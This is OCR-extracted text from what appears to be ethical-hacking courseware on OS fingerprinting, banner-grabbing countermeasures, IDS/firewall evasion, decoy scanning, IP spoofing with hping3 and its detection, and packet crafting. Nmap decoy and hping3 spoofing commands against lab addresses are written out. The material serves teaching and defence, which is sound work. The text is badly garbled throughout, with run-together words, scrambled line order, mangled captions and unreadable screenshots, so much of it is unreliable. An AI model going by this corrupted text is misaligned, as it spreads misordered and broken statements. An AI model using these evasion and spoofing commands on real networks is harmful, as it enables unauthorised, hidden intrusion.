effectivetoolsfor performing OSdiscovery activities. In Zenmap, the -0 optionis usedto
perform OSdiscovery,whichdisplays theOSdetailsofthetargetmachine.
eco

373:05Discovery
Figure usingZenmap

ical andCountermensores
Mackin ©by E-Comel
Copyright
OSDiscovery
using
Unicornscan
Source:https://sourceforge.net
In Unicornscan,
acquired
the 0Sof the ta get machinecan beidentifiedbyobserving
scan result.To perform Unicornscan,
address> is used.A s showni n the screenshot,
the
TTL
values
the syntaxfunicornscan <target IP
the tt valueacquired
i n the

after the scan is 128;

hence, the OS is possibly MicrosoftWindows(Windows 7/8/8.1/10
or WindowsServer
2008/12/16)

Possible
OSisWindows

Figure3.60:
05 Discovery
using
Uncoenscan

ical andCountermensores
Mackin ©by E-Comel
Copyright
 OSDiscovery
using Nmap
Script
Engine
Nmap serpte ngine
(NSE) canbeused to
automatea widevarity ofnetworking
tasts by allowing
the users to write and
shore sets
tacks serps

0S
use various inthe Nmap
Script
Engine
to performdiscovery on

Forample,
sminbulserptin
through
‘machine
map, smbvos-dscover
thatean beused
or
theSMBprotec,
s

(©In Zenmap,
thes optionor
seit
option
08 Discovery
usingNmap
Script
Engine
Source:https://nmap.org

Engine
(NSE}
in be automate
NmapScripting
byallowing
same
variety Nmapcan usedto
users to write andsharescripts.
efficiency
andspeed as Nmap.
a wide of networking
c an beexecutedparallelly
Thesescripts
Attackerscan alsouse various scripts
tasks
withthe
i n the Nmap Script
Enginefor performingOSdiscovery on the targetmachine. Forexample, in Nmap, smb-os~

the
SMB for
discoveryis an inbuiltscriptused collecting
protocol.
OSinformationon the target machinethrough

In Zenmap,NSEcan be generally activatedusingthe ~sCoption.If the custom scripts a re to be

specified,
thenattackerscan use the -~seript option.TheNSEresultswill bedisplayed
with
both the Nmap
normaland
XML
outputs.

ical andCountermensores
Mackin ©by E-Comel
Copyright
How] Services NmapOutput
eap
/
Ports HostsTopology
smb-o¥-dacoveynee
script
HostDetils

10.10.1010
Scan
eae
® rora1ar0 Starting tap 7.79
( netos://rmap.org
) at 2019-06-10

BAC Address:
st scciet results:
02:0C:29:79:02:09 (Wnware

10
windows 0s: Enterprise 17763 (windows
10

name’
NetBIOS.computer DESKTOO-EBISVL\x00
tine’16718:14;19005:38
2019-06 systen

Fiter
Hoss
3 usingNmap
Seript
sre 81:05Discovery Engine

ical andCountermensores
Mackin ©by E-Comel
Copyright
 OSDiscovery Fingerprinting
using IPvé6

Pv can beved to dette

Fingerprinting OSrunningon the target
machine

spect tePv log

probes a

detection
with seporateO S
engine hats pele fr IG

08 Discovery
usingIPv6 Fingerprinting
Source:https://nmap.org
|Pv6Fingerprinting
is
It hasthe same functionality
responses,and matching
another
techniqueusedto identify
the OSrunningon the target
as IPv4,suchas sending probes,
machine.
waitingand collecting
themwith the databaseof fingerprints.
ThedifferencebetweenIPv6
the
andIPv4fingerprinting
is that IPv6usesseveraladditional
advancedIPv6-specific probes along
IPv6-specifc
with a separate OSdetectionengine. Nmapsendsnearly 18 probes i n the following

the
orderto identify targetOSusingthe IPv6fingerprintingmethod.
Sequence

=
ICMPv6 (1E1)
generation
echo
(S1-S6)

=
ICMPv6 (1E2)
echo (NI)
NodeInformationQuery
(NS)
Solicitation
Neighbor

=
UDP
(U1)
TCPexplicit notification(TECN)
congestion
=

TcP
In Zenmap,
(12-17)
the ~6 optionalong
with -0 OSdiscovery
optionis usedto perform usingthe IPv6
fingerprinting
method,
Syntax:
# nmap -6 -0 <target>

ical andCountermensores
Mackin ©by E-Comel
Copyright
 BannerGrabbing
Countermeasures
Disabling
or
Changing
Banner Hiding ExtensionsfromWeb
File Page

server
hatcan
Ungerying teelogy anther

emerfooeto dapie thedort ofservers

cont users
osche2th mod_ headers module-vsea
Aecte i n neta. feo change
banner Apache can use m od
negotiationrecive

BannerGrabbing
Countermeasures
+
Disabling
or Changing Banner

connect athe
to open a theon
Whenever portis open, it implies
port grabbing
that service/banner
usingbanner
is running it. Whenattackers
techniques, system a banner
presents
sensitive informationsuch as OS,server type,and version. Using
containing. the
gathered,
information the attacker specific
identifies andthen
vulnerabilitiesto exploit
launches
© falsebanners
Display
grabbing
attacks.Thecountermeasuresagainstbanner
to mislead
or deceive
attackers
attacksare as follows:

©. Tum off unnecessary

services on the networkhostto limit informationdisclosure.

© Use ServerMask(https://www.port80software.com) tools to disable or change

banner
information.
ServerMask removes unnecessaryHTTP headerand response dataandcamouflages
the server byproviding falsesignatures.It alsoprovides you with the optionof
file a
eliminating extensionssuchas asp or aspx, andit clearly
is runningon a Microsoftserver.
indicatesthat site

Apache 2.x with mod_headers module:use a directivei n the httpd.cont file to

change
Alternatively,
change
as
the bannerinformationheaderandset the server "NewServer Name―
the ServerSignaturelineto ServerSignatureOffinthe
httpd.conffile.
The
details version
banners
should
of thevendorand in the bedisabled,

ical andCountermensores
Mackin ©by E-Comel
Copyright
 FileExtensions
Hiding fromWebPages
File extensions reveal informationabout the underlying
server technology
that an
suchbannergrabbing
attackercan use to launchattacks.Thecountermeasuresagainst
attacksare as follows:
> Hidefileextensionsto maskthewebtechnology.
©
Replace applicationmappings suchas .aspwith .htmor .foo,
etc.,to disguise
the
identity
oftheservers.
© Apache
users directives.
can use mod_negotiation

© lS userscan use toolssuchas PageXchanger to managethefile extensions.

Note: It wouldbebetterifthe file extensionsare not usedat all

ical andCountermensores
Mackin ©by E-Comel
Copyright
 ModuleFlow

Tools BD
Seanning osiscvery
Gamer crating?
(05Fingerprinting)

Scanning
Beyond
IDSandFirewall

Scanning IDS and Firewall

Beyond
Intrusiondetection
systems (IDS)
andfirewallsare securitymechanisms intendedto preventan
attackerfrom accessinga network. However,even IDSand firewallshave some security
limitations.
Attackerstry to launchattacksto exploittheselimitations.Thissection highlights
various 1DS/firewall
evasion techniques suchas packetfragmentation,source routing,IPaddress
spoofing,
ete.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 IDS/FirewallEvasionTechniques

(©.
Thouehfrewals and105san preventmalicious trafic (packets)
from enteringa network,attackerscan
to send
manage
intended to the target
packets byevading an DS of frewal throughthe following

BDrsetragmentation
TI cresting
custom
Pockets
ED source
Routing Host
Order Randomitng

port
EDsource manpuation8nd Sending Chackaums

TD
EDP
ascress
oecoy

Spooing
Adsees
Prony
Servers Avonyiers

IDS/Firewall EvasionTechniques
Althoughfirewallsand IDScan preventmalicioustraffic (packets)
from enteringa network,
attackers
can sendintended byimplementing
to thetargetthatevadethe IDS/firewall
packets
the following
techniques:
=
Theattackersendsfragmented
PacketFragmentation: probe packets
to the intended
thefragments
target,whichreassembles afterreceivingall of them
SourceRouting: The
the intendedtarget. attacker
specifies
path the routing forthemalformedpacket
to reach

SourcePort Manipulation: The attackermanipulates

the actualsource portwith the
‘commonsource portto evadethe IDS/firewall

IP AddressDecoy:
The
thatthe1DS/firewall attacker
generates
cannot determine manually
or
specifies
theactualIPaddress.
of decoys
IP addresses so

IP AddressSpoofing: Theattackerchanges
the source IPaddressesso that the attack
appearsto be comingfromsomeone else.
CreatingCustomPackets: sendscustom packets
Theattacker to scantheintended target
beyond thefirewalls.

to attacker
Randomizing
Host Order:The scans the numberof hostsi n the target
network
ina randomorder scan theintended the firewall
targetthat liesbeyond
Sending The attackersendspackets
Bad Checksums: TCP/UPD
with bad or bogus
tothe
checksums target.
intended

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Servers:Theattackerusesa chainof proxyservers to hidetheactualsource of a
Proxy
scan andevadecertain 1DS/firewall
restrictions.
Anonymizers: whichallowsthem to bypass
The attackeruses anonymizers, Internet
censorsandevadecertain IDSandfirewallrules.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 PacketFragmentation

|
Se
PacketFragmentation
Packetfragmentation refersto the splittingof a probe
packetinto severalsmallerpackets
(fragments)
whilesending it to a network.
When thesepackets
reach theIDSandfirewalls
a host,
behindthe hostgenerallyqueue all of themandprocessthemone byone, However, since this
methodof processinginvolvesgreaterCPU and networkresource consumption, the
configuration
of most IDScause themto skip fragmentedpackets
during portscans,
Therefore, attackersuse packet fragmentation toolssuchas Nmapand fragroute to splitthe
probe packet into smallerpackets that circumvent the port-scanning techniques employed by
IDS.
Once the host,
SYN/FIN
thesefragments
Scanning Using
reach destined
IP Fragments
theyare reassembled
packet.
to forma single

SYN/FIN scanning
techniques.
usingIPfragments
Thisprocess of
of scanning
is not a newscanning
w as developed
methodbut amodificationprevious
to avoidfalsepositives generated byother
packets of filtering
scans because a packet
the
target
to evadethe packet system.
TCP splits
deviceon
filter. Foranytransmission,
anddestinationportfor the initial packet (8-octet,
The header into several
everyTCPheadermust havethe source
64-bit)Theinitializedflagsi n the next packet

that detectsfragmented
protocol,andidentification.
via
allowthe remote hostto reassemble
the of
the
datapackets
the packets uponreceipt an Internet protocol
usingfield-equivalentvalues source,
module
destination,

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Srwy/rit
(Small
+ Port (n)
Fragments)

RST[ifportis closed)
Attacker
382:SYN/FIN
Figure scanning

scan,
In this
splits
the
TCPseveral
thesystem
network.However, fragments
transmits
over
IP reassembly
headerinto and them
on the server sidemay resulti n unpredictable
the
andabnormal
such
as ofthe
results,

dumps.
IP
header
data,
Some
hosts
fail
fragmentation
the fragmented
packets,
whichmayleadto crashes, reboots,
may to parseandreassemble
or even networkdevice monitoring

Somefirewallsmighthaverule sets that blockIP fragmentation

queues i n the kernel (e.g.,
CONFIG_IP_ALWAYS_DEFRAG option i n the Linux kernel), although this is not widely
implemented because
of
its
adverse
effects
methodsto indicatescanningattempts
oftenevadethis typeof packet
on performance.
on IP and/or
anddetection,
filtering
SincemanyIDSuse signature-based
TCPheaders,
resulting
in a high of of
the use fragmentation will
probabilitycausing
problems o n the targetnetwork, Attackersuse the SYN/FIN scanningmethod with IP
fragmentation
Thescreenshot
type
of
to evadethis filtering
belowshowsthe SYN/FIN
anddetection
scan using the Nmaptool.

A ~£-v 10.10.10.10
Starting Nmap (nee
2019-08-10 11:03 EDT
pervertetry

Discovered

at 11:03,

3.83:SYN/FIN
Figure sean usingNmap

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Source Routing

(©
Acthe
pacet
travels router
examines
through
IPand
thenodes i nthenetwork e8ch
thenext hopto directthe packet
chooses to the destination
thedesthatlonadress

1©
Toute(without a
Sourceoutingrefers
wth
a othe intended
to sendingpacket
frewall10S-configured
destination partalyor completely
i n orderto evadean 0S or frewal
routers)
pected

In source
al
outing,t he attacker
makes
some or ofthese

Source Routing
IPdatagram
‘An containsvarious fields,
including
the IPoptions
field,whichstoressource routing
information
‘As
address
travelsthrough
andchooses
a through the packet
andincludeslst ofIP addresses
the packet the nodesin the network,
the next hopto directthepacket
travels
which to
eachrouter examines thedestinationIP
to thedestination.
its destination,

‘When
attackers
sendmalformed
packets hopthrough
thesepackets
to a target, various routers
and gateways to reachthe destination.In some cases,the routers i n the pathmight include
configured firewallsandIDSthat blocksuchpackets. To avoidthem,attackersenforce a looseor
strict source routing mechanism, i n whichthey manipulatethe IPaddresspathi n the IPoptions
fieldso thatthepacket
to reachthe destination,thereby
evading
path
takestheattacker-defined
firewalls (without
and
firewall-/IDS-configured
IDS.
routers)

figure
‘The belowshowssource routing,
wherethe originator
dictatesthe eventualroute of the
traffic

Destination

1D
Figure284:
SourceRouting

ical andCountermensores
Mackin ©by E-Comel
Copyright
 SourcePortManipulation

|(©
refers
Sourceort manpustion actual
t o manipulating

ttoceurswhenafiewallsconiguredt
allowpackets
port
numbers
om wellknown
withcommon portnumbers

portstheM T T,DNS,FI,
inorderto

ee

Port

SourcePortManipulation
Sourceportmanipulation is a technique
usedfor bypassing the IDS/firewall,
wherethe actual
portnumbers are manipulated withcommon port numbers forevading certainIDSandfirewall
misconfigurations
rules.The main security occur becauseof blindly trustingthe source port
number. Theadministrator mostly configures
thefirewallbyallowingtheincomingtrafficfrom
well-knownportssuchas HTTP, DNS, FTP,
etc. Thefirewallcan simply
allowthe incomingtraffic
fromthe packetssent by
the attackersusingsuchcommon ports.

PeActual .

Manipulated
ker
Attackei Port:80
pono

Figure385:Frewalallowing
manipulated
port60to the Vietim fom attacker

Although
thefirewallscan bemadesecure usingapplication-level
proxies or protocol-parsing
firewall elements,
this techniquehelpsthe attackerto bypass the firewall rules easily.
The
attacker
tries
easily
bypass
to manipulatethe original
the IDS/firewall.
manipulation.
source port
port
In Zenmap, numberport which
can
with thecommon numbers,
the -g or --source-port optionis usedto perform

ical andCountermensores
Mackin ©by E-Comel
Copyright
 >
Zenmop
SeanTooleBrofile Help
Target[103101030
Command:[rmap 98010707070

Hots
08 « Host
|| | -9
© 0101030
OutputHost
Sevices Nmap
‘map
Detail. Topology
Ports/Hosts
8010:10:10.0
Scant
Detais
Starting teap 7.70 ( nttps://nmap.org) at 2019-06-27

is latency).
Net
shown:
Host up (8.005
$97 #interes ports

5357/tepopen. wedans

Nesp
done: 1 IP adress (2 host vp) scanned in 5.26

Scanning
Frewallusing
53.86: over Nmap

ical andCountermensores
Mackin ©by E-Comel
Copyright
 IP AddressDecoy

(@ address
decoy refers
technique oF manvaly
t o generating

(©appearstothe tatet thatthe decoys

theIPaddresses
specifying

a wells the hosts)

of

ae scaring thenetwork
decoys
inorder
1@Thstechniquemates i fc forthe10S whichI Paddress
ofrewal to determine was acta canning

Decoy
Scanning
usingNmap
hastwo options
Nmap fordecoyscanning

random
decoys)
© nmap- D mx0:20 (target
(Generates numberof

(anual specit he drcses ofthe decoys}

IP AddressDecoy
TheIPaddressdecoy technique refersto generating or manually specifyingIPaddressesof the
decoysto evade1DS/firewalls.It appearsto thetargetthatthe decoys as wellas the host(s)
are
scanning
address
thenetwork.Thistechnique
is actually
scanning
makesi t difficultfor theIDS/firewall
the networkandwhichIP addresses
to determine
are decoys.
IP
which
TheNmap tool comes with a built-inscan function
scanning calleda decoy scan, whichcloaksa
scan with decoys.
Thistechniquegenerates multiple IPaddresses to perform a scan,thusmaking
it difficult
forthetargetsecuritymechanisms suchas IDS, firewalls,etc.,to identifythe original
source fromthe registeredlogs.ThetargetIDSmightreportscanningfrom5-0 IP addresses;
however,
IPs,
it
cannot
differentiate
thescanning addressdecoy
between actual IP andtheinnocuous

Youcan
‘+
of
perform
two types decoyscans

[target]
nmap-D RND:10
using Nmap:

Using
scan
this
andrandomly generates
command, automatically
arandomofdecoys
number
Nmap
for
the
the realIPaddressbetweenthe decoy
positions IPs.

that targetIP
Ex.Assume
scan command
will be:
address
Thus,
the
10.10.10.10isthe to bescanned. decoy
Nmap

# nmap -D RND:10 10.10.10.10

ical andCountermensores
Mackin ©by E-Comel
Copyright
ScanTeclsBete Hep
Target [10101010

Command:[map
ORNOTO 19107010

Hoi)
05 « Howt
|
Services
Host
Nmap
m ap
/Herts Topology
Outpt Ports
-ORNO-10
10.1010.
Details Scans

Dati
© 0101010
( Starting Nap 7.70 nétpsi//omap.org
Indie Stanger
) at 2019-06-27
42:44

997
Nat-showns flitered por

AACAdseess:000¢:29:02:96:44 (Wware)

ai nao done: 1 1Padaress (1 host up) scanned in 8.41 seconds v

ure
387: RND
nmap-Ddecoy1,decoy2,decoy3,...,ME,...
Decoy
usingNmap

[target]
option

Using thiscommand,
oftheto
scan
the
you can manually
victim'snetwork.Here,you haveto separate
specify theIPaddresses
eachdecoy
decoys
IPwith a comma (,)andyoucan

use
the position
i n the 4'* position
accordingly.
your
optionally MEcommandto
ofthe command,
Thisis an optional
realIPi n the decoy
your realIP will be positioned
command,
list.If you place ME
at the 4" position
andif you do not mention ME i n your scan
‘command, then Nmap will automaticallyplaceyour realIP i n anyrandomposition.
Forexample, assumethat 10.10.10.16 i s the realsource IPand10.10.10.10 i s the target
IPaddress to bescanned, Then,the Nmapdecoy command will be:
Syntax
# nmap -D 192.168.0.1,172.120.2.8,192.168.2.8,10.10.10.16,10.10.10.5
10.10.10.10

ical andCountermensores
Mackin ©by E-Comel
Copyright
 ScanToolsefile Hep
103030 Prt

172.1202.
map 0192.16.01
79216828
10101000]10701016
101005

IE
Serces
| -0 Host
Oetait
Nop OutputPons/Hoss Topology

192.168.172.102
nmap
192.1682
1010.10.16
1010.0.
Scans
Dati
© 0101010
(
Starting Heap 7.70 nttos://omap.org)
Indie Stenaard Ti ne
at 2019-06-27
12:46

Mot 997 filtered

shown: ports

AAC
3357/tepopen _wadapt
Adseesss000¢:29:02:96:44 (Wware)

nap done: 1 1Paddress (1 host up) scanned in 6.69 seconds v

decoys
‘These can begenerated
388:Decoy
Figure with
usingNmap
manual ist
decoy
in bothinitial pingscanssuchas ICMP,
SYN,ACK,
ete.,andduring
the actualportscanningphase.
decoy
IP address is a usefultechnique for hiding
your IP address.
However,it will not be
successfulif the targetemploysactive mechanisms suchas router pathtracing,response
dropping,etc. Moreover,usingmanydecoys can slowdownthe scanning and affectthe
process
accuracyof the scan.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 IP AddressSpoofing

IP
[©
spootng
refers addresses
1@Wen thevim esto
thesource P
to ehanging s o that

the adress it goesack othe spoofed

\@aches mas theadress information nthe I packet
adres ratherthan theattacker'sel adress
header
andthesource address sd nade t o bypass

“a
IP AddressSpoofing
Mostfirewallsfilter packets
basedon the source IPaddress. Thesefirewallsexamine the source
IP addressanddeterminewhetherthe packet is comingfrom a legitimate source or an
illegitimate
source. The10Sfilters packetsfrom illegitimate
sources, Attackersuse IP spoofing
technique to bypasssuchIDS/firewalls.
IP
address
spoofing
altersthe packet
legitimate
isa hijacking
headers,
technique
andsendsrequestpackets
host.Thepackets
an obtains
a
i n which attacker computer's
to a targetmachine,
appearto be sent froma legitimate
IPaddress,
pretendingto be a
butare actually
machine sent
machine,
fromthe attacker’s while his/her
machine'sIPaddressis concealed.
Whenthe victim
replies
to theaddress,
Attackersmostly
it goesback
use IPaddress
to the
spoofing
spoofed
address
to perform to
andnot the attacker's
DoSattacks.
realaddress.

Whenthe attackersendsa connection request host,

to the target the targethostreplies
to the
spoofed
IP address.Whenspoofing thetargetreplies
a nonexistent address, to a nonexistent
andthen hangs
system until the session times out,thusconsuming a significant
amount of its
own resources.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 IPspoofing
usingMping:

IP spoofing
usingHping3:
Figure
using
3.89:1PSpoofing Moines

Hping3wew.certifiedhacker.com -a 7.7.7.7
to perform
You can use Hping3 IP spoofing. helpsyou to sendarbitrary
Theabovecommand
TCP/IP
to hosts.
packetsnetwork
Note: You will not be able to complete
the three-way
handshakeand open a successful
TCP
connection with spoofed IPaddresses.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 |
IP Spoofing Direct TTLProbes
Detection Techniques: CEH

& SEER. 7
>

Spoofing
Detection
Techniques:
|
IP IP IdentificationNumber

Sipdazrbe
totes sone
sated a thatreas re and campare the wth the
01

02
thetPI0sare
dose
value
packet
being
checked,
not
the
suspected
s
in tothe then waffi spoofed

03 considered
Thistechnque reliable
even iftheattacker
inthe same subnet

&

03
Module 248
Page ical andCountermensores
Mackin ©by E-Comel
Copyright
 |
IP Spoofing TCPFlowControlMethod
Detection Techniques: (CEH
(@ Atacherssenting
(©Therefore,
targets
TCPpackets
spoofed wll ot

attackerscannots pondto change

recive the

i n thecongestion
window
SYN-ACK
packets

1GWhen
received
awindow
exhausted,
packets
mos
kel
spoofed
watecontinues ater sels the are

IP Spoofing
DetectionTechniques
+
DirectTTLProbes

fora initially
In thistechnique,

reply. the
you

TTL
Check
packet
value
whether
(ping legitimate
with
thatof
senda
the
packet
request)
matches
in the reply
to the hostandwait
you

accordingif
checking.
are Although
Bothwill havethe same TTL theyare usingthe same protocol.
the initialTTLvaluesvary used,a fewinitial TTLvaluesare
to the protocol

commonly
used. TCP/UDP, they
For
are
thevaluesare 64and128;for ICMP, 128and255

sented 12.0.0510-TTU13

attacker
(Spooted
Address
10003)
cg
ee
Target

390:1 PSpoofing
Figure detection Direct
techniques TTL Probes
If the replyis froma differentprotocol, then you shouldcheckthe actualhopcount to
detectthe spoofed packets. Deductthe TTL valuei n the replyfromthe initialTTL valueto
determinethe hop
the TTL of the packet. count.
isa
Thepacket spoofed packetthe reply
if TTL
does
not
match
It will be very easyto launcha n attackif the attackerknowsthe

and
hopcount betweenthe source thehost.In thiscase,the test resultis a falsenegative.

ical andCountermensores
Mackin ©by E-Comel
Copyright
Thistechnique
is successful
whentheattackeris i n a different
subnetfromthatofthe
victim,
Note: Normaltrafficfromone hostcan contrastTTLsdepending
on traffic patterns.

IP Identification
Number
Userscan identify spoofed packets bymonitoring the IPidentification(IPIO)numberin
the IP packet headers.The IPID increases incrementally eachtime a systemsendsa
packet. Every
IP packet on thenetwork hasa "fragment identification―
number, whichis
increased byone for every packet
senda probe packet
i n the reply.
transmission.To
to the source IP address
TheIPIDvaluei n the response packet ofidentify
the
packet
whethera packet is spoofed,
andobservetheIPIDnumber
must becloseto but slightly greater

to of of
thanthe IPIDvalueoftheprobe packet. Thesource addressthe IP packet is spoofedif

of
the IPID the responsepacket is not close that the probe

Thismethodis effectiveeven whenboththe attackerandthe target

are
packet.
on the same
subnet.

ce
o>. a

Target

fer
-

10.0.0.5

391: Figure
TCPFlowControlMethod
P Spoofing detection IPdentfation Number
technique:

TheTCPcan optimize the flow controlon boththe sender'sandthe receiver'sendwith

algorithm
accomplishes
its algorithm,
The
sliding
window
principle. flowcontrolusingthe
Theuser can controlthe flow of IP packets bythe windowsize field i n the TCPheader.
This
amount
maximum the
represents
field
of that of
data
senderdata
maximumamount
the
thatthe recipient
can receive andthe
can transmit withoutacknowledgement. Thus,
to flow.
helps
thisfield
sender
should the
controldata
windowsize is set to zero,
The stopsendingdatawhenever

In general the sendershouldstopsending

flow control, dataonce the initialwindowsize
is exhausted. who is unaware of the ACKpacket
The attacker, containing windowsize
might
information, continue to senddatato the victim. Ifthe victim receives datapackets
beyond the windowsize,theyare spoofed
packets. Foreffective flowcontrolandearly
detectionof spoofing,
the initialwindowsize must bevery small

occur
Most spoofing
spoofing
attacks during as it is challenging
the handshake,
with the correct sequencenumber.Therefore,
replies
to build multiple
apply
the flow control
spoofed
packet handshake.
the
detectionmethodto the In a TCPhandshake,

ical
hostsending

andCountermensores ©
Mackin by E-Comel
Copyright
 SYN waits
SYN-ACK
the
theinitial packet for
aACK beforesending packet.
from a genuine clientor spoofed
you are gettingthe SYNrequest
Tocheck whether
one, set SYN-ACK
to

sends
Thisis because
ACK packet,
an data,
zero. If thesender
means one.
whenSYN-ACK
ACKwithany it that thesender
is a spoofed
is setto zero, the senderm ust respond
withoutadditional
data,
to it only
with the

axtocker
(Spootesadoress
ioaos}

392:1P
Figure Spoofingdetection TC FlowControlMethod
technique
Attackerssending spoofed TCPpackets will not receive the target's
SYN-ACK packets.
Attackerscannot respond to changesi n the congestion windowsize. Whenthe received
trafficcontinues aftera windowsizeis exhausted, the packets spoofed.
are most likely

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Countermeasures
IP Spoofing

Encrypt the network cryptographic

trafic using networkprotocolssuch TLS,
s IPsec, SH, and HTTPS

‘Use firewalls
multiple
a depthofprotection
to providemultilayered

‘notely on IP-based
authentication

Use random
initalsequencen umber
to preventIP spoofing
attacks
based number
on sequence spoofing

IngresFitring:Use
roversnetwork
and firewalls
at your t o ler incoming
perimeter packetstha appar

©sarestiterin Fr with anna lal

oteig packets Padres nthe source adres

IP Countermeasures
Spoofing
ethical
In
hacking,
ethical
hacker,
does
taskthat anormalhacker as“pen
the
adopting has an
alsoknown the
against
not follow(i.e.,
tester,―to performadditional
countermeasures the respective

vulnerabilities
determined
in yournetwork
through
adopt
is worthless
unless
hacking).
you
Thisis essentialbecause
measuresto protect
knowing
security
themagainst
loopholes
realhackers. As
mentionedpreviously,
targetnetwork.
spoofing
of
IPspoofing
Therefore,to protect a
is one the techniques
apply
that hackeradopts
your networkfromexternalhackers,
countermeasuresto your networksecurity
to breakinto the
you should
SomeIPspoofing
settings. countermeasures
IP

apply as
‘that
you can are follows:

=
relationships
Avoidtrust
Donot relyon IP-based spoof
authentication. Attackersmay themselves as trustedhosts

malicious
packets
andsend
accept
theyare “clean―
your system.
because
Therefore,
packets that
to you.If you these underthe assumption
theyare fromyour trustedhost,the maliciouscodewill infect
itis advisable to test all packets,
even whenthey come fromone
of your trusted hosts.You can avoid this problem by implementing password
authenticationalong
with trust-relationship-based authentication.
Use firewallsandfiltering
mechanisms
{Asstatedabove, you shouldfilteralltheincomingandoutgoing packets to avoidattacks
andsensitive informationloss.Afirewallcan
restrict
malicious
entering
packets
blockunauthorizedaccess,At the same time,there is a possibility
from
privatenetworkandpreventsevere dataloss.Youcan use accesscontrollists(ACLs)
your
to
of an insiderattack
Insideattackerscan sendsensitive informationaboutyour business to your competitors,
whichcouldleadto monetary lossandother issues.Anotherriskof outgoing packets is
i n installing
that an attackerwill succeed a
malicious
sniffing
programrunningi n a hidden

03
Module Page252 ical
© andCountermensores
Mackin Copyright
by E-Comel
modeon yournetwork. Theseprogramsgather andsendall yournetworkinformation
to
the attackerwithout any notificationafter filtering
the outgoingpackets.
Therefore,
you
shouldassignthesame importance to thescanning ofoutgoingpackets
as youwouldto
that of incomingpackets,
Use randominitial sequence
numbers
Most deviceschoose theirISNbased o n timedcounters.Thismakes theISNspredictable,
as an to the of the
itis easyfor attacker
can determine
determine conceptgeneratingISN.Theattacker
the ISNof the next TCPconnection byanalyzing
sessionor connection. If the attackercan predict
the ISNof the current
the ISN,then he/she can establisha
maliciousconnection to the server andsniff out your network traffic.To avoid this risk,
use randominitial sequence numbers,
Ingress
filtering
Ingress
filtering
spoofed
trafficthe
prevents
becauseit enhances
fromenteringInternet.
the functionality
tis appliedrouters
of the routers and blocksspoofed traffic.to
Configuring packets
andusingACLsthat drop
rangeis one methodof implementing
withthe source address
ingressfiltering,
outsidethedefined

Egress
filtering
Egress
filtering
refersto a practice
that aims to preventIP spoofing
byblocking
outgoing
packets
witha source address
that is not inside.
Useencryption

its for
all
If you want to attain maximum networksecurity, then use strongencryption the
trafficplaced onto thetransmissionmediawithout considering typeandlocation.
This
is the bestwayto prevent IPspoofing
attacks.IPseccan beusedto reducethe IPspoofing
risk drastically, as it provides data authentication, and confidentiality
integrity,
Furthermore, ACLscan be usedfor blocking privateIP addressesat the downstream
interfaces. sessions shouldbeenabledon the router
Encryption so that trustedhostscan
communicate securely
with localhosts.Attackerstend to focuson easy-to-compromise

a
of wants
break
f an attacker
targets.
whole
encrypted
packets,
slew
which he
dificult
task.orshe
has
to

thetod
is
l ecrypt
into the encrypted

ikely isa
network,
Therefore, attacker
attempt.Moreover, or
to move on andtryto findanothertargetthat is easyto compromisesimply
usethe latestencryptionalgorithms that provide
abortthe
strongsecurity.
SYNflooding
countermeasures
againstSYNflooding
Countermeasures attackscan also helpyou to avoidIP spoofing
attacks.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 7
CustomPackets
Creating CEH
Py
Caatrm Pecks vingPach
‘resting

Creating
Custom Packets (Cont'd)
‘Creting
(8
Cartom
aches
pending
String
| Creating
Custom
Packets
Packotaby
by
Rppending
poenda Random
number
fandom
Cstom

sondareguarsvingapaylondsinthe
pacers Aacits dt so
Data

Foose
‘

frewat
(example:
"Pha
dtstrng sae (©amp: dotting

Creating
Custom Packets
The attackercreates and sendscustom packets
to scan the intended targetbeyondthe
Various techniques
IDS/firewalls. are used to create custom packets.Some of them are
mentionedbelow:
Creating byusingPacketCrafting
CustomPackets Tools

ical
Mackin
and ©by CountermensoresCopyright
E-Comel
Attackerscreate custom TCPpackets to scan the targetbybypassing the firewalls.
Attackers use various packetcrafting tools such as Colasoft packetbuilder
(https://www.colasoft.com),NetScanTools Pro(https://www.netscantools.com), etc.,to
scan the targetthat is beyondthe firewall.Packetcrafting toolscraftandsendpacket
streams(custom packets)usingdifferentprotocols at different
transferrates.
Colasoft
Packet
Builder
Source:https://www.colasoft.com
ColasoftPacketBuilderis a tool that allowsan attackerto create custom network
packetsand helpssecurityprofessionals assess the network.Theattackerc an select
packet
a TCP fromthe provided templates andchange theparameters i n the decoder,
hexadecimal,or ASCIIeditor to create a packet. In addition to building packets,
Colasoft
PacketBuildersupports savingpackets to packetfilesandsending packets
to
the
network.
eee
fa) 2.2.
F
recite Fact) (GPRS Phew sett

oo
| ATTY

Screenshotof Colasoft
Figure3.93: Packet
Buller

*
aredisplays
views
There three
PacketList
in thePacket
Builder:
Packet
List,
all the constructedpackets.
Decode
Editor,
Editor.
Whenyou selectone or more
andHex

packetsin PacketList,the first highlighted

packet
is displayed
i n both Decode

Editor for
Editor editing,
andHex

ical andCountermensores
Mackin ©by E-Comel
Copyright
 * In Hex Editor,the dataof the packet
are represented
as hexadecimal
valuesand
ASCIIcharacters;nonprintable a re represented
characters bya dot
or
the
ASCIIsection.You can editeitherthehexadecimal values ASCIIcharacters,
+
Editor
allows
Decode
attacker
length, edit the
the to packets without remembering value
the valuein the
byteorder,andoffsets.Youcan selecta field andchange
edit box.

For packet,
or
creatinga
theToolbarto create a new packet.
command i n theEditmenu
youcan use theaddor insert packet

‘The packet
attackerc an senda constructed to wire directly
andcontrolhowColasoft
PacketBuildersendsthe packets, specifying,
for example,the interval between
packets,
looptimes,anddelay betweenloops.
packet
‘This
andintruders.
bypass
builder
audits networksandchecks
Attackersmayuse thispacket
networkfirewallsandIDSsystems.
the networkprotection
builderto create fragmented
Theycan alsocreate packets
against
attacks
packetsto
andfloodthe
victim with a verylarge
number of packets,
whichcouldresulti n DoSattacks.
Creating
CustomPacketsbyAppending CustomBinary Data
sendbinary
‘Attackers data (0'sand 1's)as payloads
i n the packets
sent to the target
machine presentbehindthefirewall.Theoption usedbyNmap forappending custom
binarydata to the sent packetsis --data <hex string>. Any<hex string> is
specifiedi n the formats OxAABBCCDDEEFF<...>,
AABBCCDDEEFF<...>,
